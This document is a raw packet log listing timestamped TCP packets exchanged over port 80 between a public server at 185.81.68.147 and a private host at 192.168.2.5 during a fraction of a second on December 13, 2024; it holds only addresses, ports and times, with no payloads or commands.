Dec 13, 2024 01:37:08.401829958 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.401966095 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.402075052 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.402720928 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.402843952 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.402951956 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.403666019 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.403779984 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.403883934 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.404562950 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.404616117 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.404720068 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.405469894 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.405590057 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.405689955 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.406374931 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.406505108 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.406608105 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.407269001 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.407370090 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.407474995 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.408233881 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.408365011 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.408469915 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.409102917 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.409229040 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.409336090 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.410018921 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.410128117 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.410243988 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.410928011 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.411041021 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.411149025 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.411828995 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.411961079 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.412080050 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.412739038 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.412853003 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.412965059 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.413650036 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.413779020 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.413891077 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.414568901 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.414690971 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.414800882 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.415469885 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.415576935 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.415684938 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.416426897 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.416512966 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.416630030 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.417296886 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.417475939 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.417582989 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.418214083 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.418294907 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.418405056 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.419110060 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.419231892 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.419337988 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.420028925 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.420128107 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.420233011 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.420934916 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.421051979 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.421161890 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.421833038 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.421979904 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.422087908 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.422745943 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.422867060 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.422975063 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.423655033 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.423784018 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.423894882 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.424576998 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.424679995 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.424791098 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.425476074 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.425590992 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.425707102 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.426388025 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.426510096 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.426625013 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.427295923 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.427612066 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.427722931 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.428247929 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.428380013 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.428486109 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.429073095 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.473412037 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.573374033 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.573470116 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.573729992 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.573779106 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.573918104 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.574033022 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.574661016 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.575004101 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.575069904 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.575100899 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.575941086 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.576001883 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.576040030 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.576803923 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.576884031 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.576925039 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.577732086 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.577811003 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.577857018 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.578629017 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.578706980 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.578730106 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.579536915 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.579613924 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.579736948 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.580449104 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.580527067 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.580557108 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.581370115 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.581449986 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.581489086 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.582278013 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.582359076 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.582398891 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.583175898 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.583256006 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.583292007 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.584084988 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.584186077 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.584207058 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.585001945 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.585081100 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.585119963 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.585901976 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.585994959 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.586021900 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.586823940 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.586910963 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.586932898 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.587707043 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.587790966 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.587836981 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.588620901 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.588710070 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.588763952 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.589560032 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.589643002 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.589732885 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.590471983 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.590545893 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.590574980 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.591386080 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.591459990 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.591495991 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.592278004 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.592365980 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.592385054 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.593213081 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.593296051 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.593337059 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.594130039 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.594230890 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.594250917 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.595033884 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.595113039 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.595134974 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.595936060 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.596009016 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.596045017 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.596829891 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.596903086 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.596987963 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.597742081 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.597815037 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.597843885 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.598726034 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.598787069 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.598809958 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.600264072 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.600280046 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.600337029 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.600502968 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.600570917 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.600583076 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.601391077 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.601449966 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.601466894 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.602283955 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.602360964 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.602399111 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.603224993 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.603287935 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.603300095 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.604123116 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.604199886 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.604309082 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.605031967 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.605103970 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.605135918 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.605936050 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.606009960 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.606046915 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.606839895 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.606911898 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.606955051 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.607738972 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.607800961 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.608026981 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.608659983 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.608720064 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.608800888 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.609570980 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.609632015 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.609694958 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.610486031 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.610543966 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.610577106 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.611402035 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.611463070 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.611500978 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.612279892 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.612339020 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.612381935 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.613188982 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.613253117 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.613298893 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.614114046 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.614171982 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.614200115 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.615041971 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.615137100 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.615151882 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.615923882 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.615993977 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.616030931 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.616832972 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.616908073 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.616908073 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.617748022 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.617819071 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.617907047 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.618679047 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.618748903 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.618777990 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.619570971 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.619641066 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.619684935 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.620491028 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.620559931 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.620564938 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.660929918 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.765141010 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.765264988 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.765569925 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.765588999 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.765629053 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.765763044 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.766498089 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.766597986 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.766716957 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.767406940 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.767501116 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.767615080 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.768302917 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.768379927 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.768498898 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.769216061 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.769330978 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.769442081 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.770136118 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.770227909 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.770370960 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.771049976 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.771102905 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.771213055 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.771958113 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.772061110 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.772173882 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.772881031 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.772975922 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.773091078 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.773765087 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.773808002 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.773917913 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.774674892 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.774782896 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.774916887 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.775608063 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.775702000 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.775810003 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.776527882 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.776694059 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.776801109 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.777400970 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.777579069 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.777682066 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.778310061 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.778449059 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.778548956 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.779248953 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.779351950 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.779455900 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.780117035 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.780263901 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.780375957 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.781047106 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.781197071 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.781301975 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.781966925 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.782161951 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.782274008 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.782865047 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.782965899 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.783014059 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.783824921 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.783955097 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.784037113 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.784696102 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.784818888 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.784882069 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.785588026 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.785722971 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.785769939 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.786498070 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.786674023 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.786756039 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.787429094 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.787589073 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.787637949 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.788353920 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.788443089 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.788491011 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.789258957 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.789387941 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.789437056 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:08.790170908 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.790330887 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:08.790447950 CET	49707	80	192.168.2.5	185.81.68.147
